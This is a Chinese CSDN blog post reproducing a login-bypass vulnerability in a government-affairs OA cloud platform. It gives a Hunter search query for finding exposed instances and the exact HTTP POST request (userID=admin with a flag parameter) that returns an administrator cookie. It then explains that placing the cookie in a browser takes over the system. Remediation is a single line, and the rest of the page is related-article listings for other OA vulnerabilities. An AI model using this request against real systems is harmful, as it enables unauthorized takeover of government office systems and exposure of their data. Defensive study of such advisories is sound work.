数字通云平台智慧政务 login 存在登录绕过

最新推荐文章于 2024-10-17 15:33:31 发布
最新推荐文章于 2024-10-17 15:33:31 发布
阅读量435 收藏 5
点赞数 7
文章标签: 政务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37834054/article/details/142562390
版权

- 0x01 漏洞描述:

  • 数字通云平台智慧政务OA产品是基于云计算、大数据、人工智能等先进技术,为政府部门量身定制的智能化办公系统。该系统旨在提高政府部门的办公效率、协同能力和信息资源共享水平,推动电子政务向更高层次发展。

  • 数字通云平台 智慧政务OA login接口存在未授权获取默认cookie,未经身份验证的远程攻击者可利用该漏洞伪造登录,从而接管整个系统。

0x02 搜索语句:

鹰图:web.body=“assets/8cca19ff/css/bootstrap-yii.css”

在这里插入图片描述
0x03 漏洞复现:

该漏洞是由于系统中存在默认cookie获取接口导致的权限绕过

POST /portal/default/login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
 
userID=admin&flag=rone

获取cookie
在这里插入图片描述
将cookie 写入到浏览器中
在这里插入图片描述
直接访问ip或者
http://your-ip:port/theme/concise
在这里插入图片描述
0x04 修复建议:

系统禁用默认获取cookie接口

西门有雨不吹雪
关注
数字云平台 智慧政务 PayslipUser SQL注入漏洞复现
0xSec
07-17 1391
数字云平台 智慧政务OA PayslipUser 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
政务服务一网云平台智慧政务大数据资源中心建设方案
zuoan1993的博客
11-06 1739
对一网办总体架构的理解中心总体定位总体建设目标总体解决方案6总体应用流程平台总体架构政务大数据治理管理方法论平台方案概述·一站式数据治理运营平台,支撑全流程数据流转管理数据治理流程政务大数据·基础/专题/主题库开发与运营大数据治理管理平台·数据治理方案平台架构关系数据支撑子平台·数据范围与存储数据共享交换子平台·总体架构数据共享交换子平台·技术方案数据治理子平台·总体架构数据治理子平台·功能架构数据治理子平台·数据应用开发整体流程数据治理子平台·数据质量管理统一运维子平台·功能架构基础库建设·总体方案基础
数字指尖云平台智慧政务login存在登录绕过漏洞
weixin_43167326的博客
09-24 1003
中科数字(北京)科技有限公司全新架构的智慧办公系统,由9大类、50多个主要功能模块构成。旨在为组织单位内部提供全新一代智慧型协同办公系统,数字指尖云平台-智慧政务存在登录绕过漏洞。
数字指尖云平台智慧政务平台存在SQL注入漏洞
m0_59117112的博客
04-12 427
数字指尖云平台存在SQL注入漏洞,可过SQL注入可获取敏感信息甚至获取到服务器权限。
HiBOS酒店宽带运营系统存在任意文件读取漏洞
weixin_43167326的博客
07-18 392
HiBOS酒店宽带运营系统是一套全面的网络管理解决方案,专为酒店设计。它提供了高速、稳定的互联网连接,并支持用户登录管理、带宽分配、网络监控和数据分析功能。过高度定制化的界面和操作,HiBOS系统能够优化网络性能,提升宾客的在线体验,同时帮助酒店管理人员高效监控和维护网络环境。
智慧农业云平台APP[中易云智慧农业物联网]
全行业物联网解决方案,为企业上云提供一站式解决方案,快速实现物联网化。
06-14 4259
一、背景 我国是农业生产大国,农业是国民经济的基础,关系到国计民生,所以无论是对国家还是企业起来说,保证农业健康发展都极为重要。 近年来,随着物联网技术、大数据、人工智能等新一代信息技术发展,使传统农业从粗放型向精细化转型升级,智慧农业已成为未来全球农业发展的方向。 与此同时,移动物联网的发展使得农户可以过各种手机APP监控生产数据,但这些APP数据单一化、碎片化,不能为农户提供有力的指导...
STM32+ESP8266+MQTT协议连接阿里云物联网平台
热门推荐
07-13 5万+
一、环境介绍 单片机采用:STM32F103C8T6 上网方式:采用ESP8266,也可以使用其他设备代替,只要支持TCP协议即可。比如:GSM模块、有线网卡等。 开发软件:keil5 二、实现功能 过阿里云物联网服务器实现设备数据远程上传、下发,实现数据交互。 在当前使用的开发板上有4盏LED灯、一个蜂鸣器、4个按键。 三、阿里云物联网服务器创建步骤 说明:如果没有账号的话,先点击网页右上角,注册一个账号,并完成实名认证再继续下一步。 产品名称根据自己情况填...
智慧农业: STM32F103ZE+ESP8266+腾讯云物联网平台+微信小程序设计
05-22 2万+
腾讯IOT物联网物联网平台。腾讯的物联网平台比起其他厂家的物联网平台更加有优势,腾讯物联网平台可以将数据推到微信小程序上,用户可以直接使用小程序绑定设备,完成与设备之间交互,现在用户基本都会使用微信,所以使用起来非常方便。
数字云平台 智慧政务OA PayslipUser SQL注入漏洞
weixin_43167326的博客
08-13 967
HiBOS酒店宽带运营系统是一套全面的网络管理解决方案,专为酒店设计。它提供了高速、稳定的互联网连接,并支持用户登录管理、带宽分配、网络监控和数据分析功能。过高度定制化的界面和操作,HiBOS系统能够优化网络性能,提升宾客的在线体验,同时帮助酒店管理人员高效监控和维护网络环境。
数字指尖云平台存在SQL注入漏洞
qq_36334672的博客
01-24 668
数字指尖云平台存在SQL注入漏洞,可过SQL注入可获取敏感信息甚至获取到服务器权限。
Goby自定义漏洞之EXP
m0_46699477的博客
11-06 5885
前言:自定义漏洞配合EXP,提高漏洞的利用速度,简直是爽的飞起!自从HVV的时候Goby发布HVV专版,羡慕死了,就是太菜没傍上红方大佬的腿。虽然最终用上了HVV专版,但是一些只有你自己知道的漏洞,或者比较偏门的漏洞,就需要咱们自己来编写PoC或者是EXP。因为Goby没有开源,所以也能编写一些基于http命令执行的漏洞!特别感谢Goby的大佬——帅帅的涛哥支持 0x001 最终效果 直接获取明文密码,点击验证。 0x001 编写流程 我在《自定义PoC对接插件》一文中已经介绍过了如何编写自定义P..
达OA系统11.2漏洞
qq_50854662的博客
12-02 5231
达OA系统11.2版本为案例的Web渗透
基于SSM党务政务服务热线管理系统的设计
2401_87849773的博客
10-17 282
管理员账户功能包括:系统首页,个人中心,用户管理,部门管理,办事信息管理,信息记录管理,系统管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。前台账号功能包括:系统首页,个人中心,部门,信息记录,后台管理。服务器:SpringBoot自带 apache tomcat。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
PHP政务招商系统——高效连接共筑发展蓝图
2401_84593645的博客
10-14 518
综上所述,政务招商系统作为政府与投资者之间的桥梁和纽带,在推动地方经济发展中发挥着举足轻重的作用。它不仅提高了招商的效率和成功率,也优化了招商环境和服务质量。如果你正在寻找投资机会或希望推动地方经济发展,不妨关注并了解政务招商系统,相信它会为你带来更多的惊喜和机遇!
基于SpringBoot+Vue+uniapp微信小程序的乡村政务服务系统的详细设计和实现(源码+lw+部署文档+讲解等)
最新发布
源码好优多
10-17 741
可行性分析是每开发一个项目必不可少的一部分,可行性分析可以直接影响一个系统的存活问题,针对开发意义进行分析,还有就是是否可以过所开发的系统来弥补传统手工统计模式的不足,是否能够更好的解决阿博图书馆管理系统存在的问题等,过对该阿博图书馆管理系统的开发设计,不仅能够逐步减少工作人员的工作量,而且还可以进行高效工作和管理。所以该系统的开发实现了最大的意义和价值,在系统完成后,利益是否大过于成本,是否能够达到预期效果,这些方面都要进行可行性分析,再过分析之后,就可以决定是否开发此系统。
下一代智慧政务云平台设计方案
"下一代智慧政务云平台方案建议书旨在构建高效、安全的政务信息系统,过IaaS、PaaS层的设计,实现政务云平台的自动化运维、大数据处理和全面安全保障。" 该方案首先从IaaS(基础设施即服务)层面展开,旨在提供一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值